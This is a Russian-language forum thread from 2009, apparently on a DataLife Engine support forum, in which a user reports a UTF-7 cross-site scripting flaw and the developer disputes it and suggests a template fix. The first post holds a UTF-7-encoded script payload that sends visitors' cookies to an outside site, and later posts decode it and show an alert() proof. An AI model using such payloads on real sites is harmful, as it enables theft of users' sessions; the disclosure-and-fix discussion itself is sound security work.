WWW.ZEOS.IN 1 161 Опубликовано: 30 декабря 2009 Рассказать Опубликовано: 30 декабря 2009 Уязвимы те, у кого в main.tpl первой строчкой НЕ идёт: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> Заходим на такой сайт и пишем новость с названием: +ADw-/title+AD4APA-meta http-equiv+AD0AIg-Content-Type+ACI- content+AD0AIg-text/html+ADs- charset+AD0-utf-7+ACIAPg- В короткой новости пишем, что угодно, а в полной пишем: +ACIAPgA8-script+AD4-document.location.href+AD0-'http://www.site.ru/script.php?cookie+AD0-'+-document.cookie+-''+ADw-/script+AD4APAAi- (код в одну строку) В итоге куки пользователя, который просмотрит страницу, улетят на другой сайт Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 30 декабря 2009 Рассказать Опубликовано: 30 декабря 2009 Не сработало ни в одном браузере. Но даже если бы и сработало украсть куки скрипта через JS невозможно, т.к. DLE использует безопасный режим куков, которые недоступны при обращении к ним через JS. В данном случае я никаких проблем не вижу. Но есть подозрение что уязвимости может быть подвержен браузер IE6, проверить не могу, т.к. не нет в наличии столь старого браузера.А вообще если проблема и имеет место быть, для столь старых браузеров, чего я проверить не могу, то решение простое в файле engine/engine.php найдите <title>{$metatags['title']}</title> <meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" /> и просто поменяйте их местами, чтобы было <meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" /> <title>{$metatags['title']}</title>Все. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 30 декабря 2009 Рассказать Опубликовано: 30 декабря 2009 Автор Странно, у меня все браузеры новые и во всех, если зайти сюда: Ссылка выскакивает сообщение "Проверка" Во всех браузерах стоит авто-определение кодировки. Вот этот код: +ADw-/title+AD4APA-meta http-equiv+AD0AIg-Content-Type+ACI- content+AD0AIg-text/html+ADs- charset+AD0-utf-7+ACIAPg- означает: </title><meta http-equiv="Content-Type" content="text/html; charset=utf-7"> Соответственно любой браузер у меня обрабатывает стараницу в кодировке UTF-7 и в HTML коде такое: <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title><meta http-equiv="Content-Type" content="text/html; charset=utf-7"> » DLE</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /> <meta name="description" content="ÏÐÎÁÓÉ ÒÓÒ"><script>alert("Проверка")<script><"" /> <meta name="keywords" content="OOOACIAPgA8scriptAD4alertACIEHwRABD4EMgQ1BEAEOgQwACIADwscriptAD4APAAi, I?IAOE" /> А вот этот код: +ACIAPgA8-script+AD4-alert(+ACIEHwRABD4EMgQ1BEAEOgQwACI-)+ADw-/script+AD4APAAi- это: "><script>alert("Проверка")</script><" А если это Журналист и он может редактировать новость в админке, то он может даже так сделать: <meta name="description" content=""><meta http-equiv="Content-Type" content="text/html; charset=utf-7"><"" /> <meta name="keywords" content=""><meta http-equiv="Content-Type" content="text html; charset=utf-7"><"" /> Цитата Ссылка на сообщение Поделиться на других сайтах
flo.mAster 7 Опубликовано: 30 декабря 2009 Рассказать Опубликовано: 30 декабря 2009 Не сработало ни в одном браузере. Но даже если бы и сработало украсть куки скрипта через JS невозможно, т.к. DLE использует безопасный режим куков, которые недоступны при обращении к ним через JS. В данном случае я никаких проблем не вижу. Но есть подозрение что уязвимости может быть подвержен браузер IE6, проверить не могу, т.к. не нет в наличии столь старого браузера. А вообще если проблема и имеет место быть, для столь старых браузеров, чего я проверить не могу, то решение простое в файле engine/engine.php найдите <title>{$metatags['title']}</title> <meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" /> и просто поменяйте их местами, чтобы было <meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" /> <title>{$metatags['title']}</title> Все. Можно передать dle_login_hash Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 30 декабря 2009 Рассказать Опубликовано: 30 декабря 2009 Странно, у меня все браузеры новые и во всех, если зайти сюда: Ссылка выскакивает сообщение "Проверка" Зашел и ни один браузер ничего не вывел. У меня что браузеры не такие? Во всех браузерах стоит автоопределение. Может у вас как раз utf-7 принудительно установлено? А если это Журналист и он может редактировать новость в админке, то он может даже так сделать: <meta name="description" content=""><meta http-equiv="Content-Type" content="text/html; charset=utf-7"><"" /> <meta name="keywords" content=""><meta http-equiv="Content-Type" content="text html; charset=utf-7"><"" /> кодировку сайта можно задать только одним тегом, браузеры воспринимают только самое первое определение, все остальные браузерами игнорируются, хоть миллион раз их пишите. И подобный текст ни один браузер не обработает Вот этот код: +ADw-/title+AD4APA-meta http-equiv+AD0AIg-Content-Type+ACI- content+AD0AIg-text/html+ADs- charset+AD0-utf-7+ACIAPg- означает: </title><meta http-equiv="Content-Type" content="text/html; charset=utf-7"> Соответственно любой браузер у меня обрабатывает стараницу в кодировке UTF-7 Чтобы этот код что то означал, нужно чтобы браузер изначально посчитал страницу в кодировке UTF-7, т.к. +ADw-/ и прочее может работать исключительно в кодировке utf-7 Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 30 декабря 2009 Рассказать Опубликовано: 30 декабря 2009 Автор Не знаю даже как и быть Может это из-за этого: Снять галочки не могу Попробовал удалить все шрифты и всё равно выполняется UTF-7 когда пишу такой код +ACIAPgA... P.S. Microsoft Windows XP Professional (Версия 2002, Service Pack 2) Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 30 декабря 2009 Рассказать Опубликовано: 30 декабря 2009 WWW.ZEOS.IN, Нужно больше статистических данных по этому вопросу, у меня Windows 7 и я не вижу проблем ни в одном браузере. Не удаляйте пока новость по ссылке, завтра я еще попробую в офисе с компьютера на windows xp Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 30 декабря 2009 Рассказать Опубликовано: 30 декабря 2009 Автор Спасибо Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 31 декабря 2009 Рассказать Опубликовано: 31 декабря 2009 Проверил на XP ничего не сработало Даже незнаю почему это у вас срабатывает Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 31 декабря 2009 Рассказать Опубликовано: 31 декабря 2009 Автор У меня срабатывает на двух компьютерах из трёх Буду разбираться как это можно выключить в системе Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.